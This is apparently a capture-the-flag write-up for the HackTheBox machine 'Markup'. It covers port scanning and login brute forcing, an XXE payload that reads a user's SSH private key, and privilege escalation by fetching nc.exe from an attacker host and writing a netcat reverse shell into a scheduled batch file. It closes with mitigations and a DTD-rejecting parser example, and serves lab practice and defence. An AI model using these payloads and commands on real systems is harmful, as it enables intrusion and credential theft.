HackTheBox: Markup Writeup


Overview

Markup is a Windows-based HackTheBox machine that involves web application exploitation through XXE (XML External Entity) injection, SSH key extraction, and privilege escalation via file injection. This writeup details the complete penetration testing methodology.

Reconnaissance

Port Scanning

Initial reconnaissance begins with a comprehensive port scan:

nmap -sV -sC -p- <HTB_IP>

Open Ports:

  • 22/tcp – OpenSSH for Windows 8.1
  • 80/tcp – Apache httpd 2.4.41 (Win64) with PHP 7.2.28
  • 443/tcp – Apache httpd 2.4.41 (Win64) with SSL

The web server is running Apache on Windows with PHP support. The site title is “MegaShopping”, suggesting an e-commerce application.

Web Application Enumeration

Browsing to http://<HTB_IP> reveals a shopping website. We need to identify authentication mechanisms and input points that might be vulnerable to injection attacks.

Initial Access

Authentication Bypass / Brute Force

The application requires authentication. We can attempt to brute force credentials using tools like medusa:

medusa -h <HTB_IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/login

After identifying valid credentials or finding a vulnerable endpoint, we proceed to explore the application’s functionality.

XXE (XML External Entity) Injection

The application appears to process XML data, likely for order processing. We discover an XXE vulnerability that allows us to read local files.

XXE Payload:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order>
<quantity>
3
</quantity>
<item>
&test;
</item>
<address>
17th Estate, CA
</address>
</order>

Key Components:

  • Entity Declaration: <!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>
  • Entity Reference: &test; (used in the item field)

This XXE payload reads the SSH private key from C:\Users\daniel\.ssh\id_rsa.

Alternative XXE Examples

For reading other files, we can modify the file path:

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>

The entity is then referenced with &test; in the XML document.

SSH Access

After extracting Daniel’s SSH private key, we save it to a file and set proper permissions:

chmod 600 id_rsa
ssh -i id_rsa daniel@<HTB_IP>

We now have user-level access to the system.

Privilege Escalation

Enumeration with WinPEAS

Once on the system, we download and run WinPEAS to identify privilege escalation vectors:

# Download WinPEAS from the attacker web server (wget is the PowerShell alias for Invoke-WebRequest, which needs a full URI)
wget http://<Attacker_ip>/winpeas.exe -OutFile winpeas.exe
.\winpeas.exe

File Injection Vulnerability

WinPEAS reveals interesting file permissions. We check the permissions on C:\Log-Management\job.bat:

icacls C:\Log-Management\job.bat

The output shows that both admin and daniel have write permissions on this file. The batch file is executed by a scheduled task with elevated privileges, so whoever can write to it controls what runs in that context.

Exploiting File Injection

Since we can write to job.bat and it likely runs as a scheduled task with higher privileges, we inject a reverse shell payload:

  1. Download netcat into the writable directory (if not already present):

     wget http://<Attacker_ip>/nc.exe -OutFile C:\Log-Management\nc.exe

  2. Overwrite job.bat with a reverse shell command:

     echo C:\Log-Management\nc.exe -e cmd.exe <Attacker_ip> 4444 > C:\Log-Management\job.bat

  3. Start a listener on the attacker machine:

     nc -lvnp 4444

  4. Wait for the scheduled task to execute, or trigger it if possible.

Alternatively, we can write a more sophisticated reverse shell directly into the batch file.

Root Access

Once the scheduled task executes, we receive a reverse shell with administrator privileges. We can then retrieve the root flag:

type C:\Users\Administrator\Desktop\root.txt

Key Takeaways

  1. XXE Vulnerabilities: XML External Entity injection can be used to read local files, perform SSRF, or cause denial of service. Always validate and sanitize XML input.
  2. SSH Key Extraction: Private keys stored in predictable locations can be extracted through file read vulnerabilities.
  3. File Injection: Writeable files that are executed by scheduled tasks or services with elevated privileges present a significant security risk.
  4. Permission Auditing: Regularly audit file and directory permissions, especially for files that are executed automatically.

Mitigation Recommendations

  • Disable XML external entity processing in XML parsers
  • Implement proper input validation and sanitization for XML input
  • Use secure file permissions and avoid storing sensitive keys in predictable locations
  • Implement least privilege for scheduled tasks and services
  • Regularly audit and review scheduled tasks and their associated files
  • Use application whitelisting to prevent execution of unauthorized binaries
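As an added illustration of the first two recommendations (this is not code from the writeup or from the Markup application), the following Python rejects any inbound order document that declares a DTD before it reaches the XML parser; the two order documents are constructed to match the format shown in the XXE section.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a legitimate order in the format the application accepts.
CLEAN_ORDER = b"""<?xml version="1.0"?>
<order>
<quantity>3</quantity>
<item>Laptop</item>
<address>17th Estate, CA</address>
</order>"""

# Constructed sample: the same request carrying the XXE entity declaration.
XXE_ORDER = b"""<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order>
<quantity>3</quantity>
<item>&test;</item>
<address>17th Estate, CA</address>
</order>"""

# An order never needs a DTD, so any DOCTYPE (and thus any ENTITY) is hostile.
# XML keywords are case-sensitive, so a literal match is sufficient.
_DTD_RE = re.compile(rb"<!DOCTYPE")

def has_dtd(xml_bytes):
    """True if the document carries a DOCTYPE declaration."""
    return _DTD_RE.search(xml_bytes) is not None

def parse_order(xml_bytes):
    """Parse an order, refusing DTDs before the XML parser sees them.
    Python's stdlib parser does not fetch external entities, but libxml2
    with LIBXML_NOENT does; rejecting the DTD up front covers both."""
    if has_dtd(xml_bytes):
        raise ValueError("DTD declarations are not allowed in orders")
    root = ET.fromstring(xml_bytes)
    fields = {}
    for name in ("quantity", "item", "address"):
        node = root.find(name)
        if node is None or node.text is None:
            raise ValueError("missing field: " + name)
        fields[name] = node.text.strip()
    fields["quantity"] = int(fields["quantity"])
    return fields

def accepts(xml_bytes):
    try:
        parse_order(xml_bytes)
        return True
    except (ValueError, ET.ParseError):
        return False
```

In PHP the corresponding controls are never passing LIBXML_NOENT to the libxml-based loaders and, on PHP 7, calling libxml_disable_entity_loader(true) before parsing.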
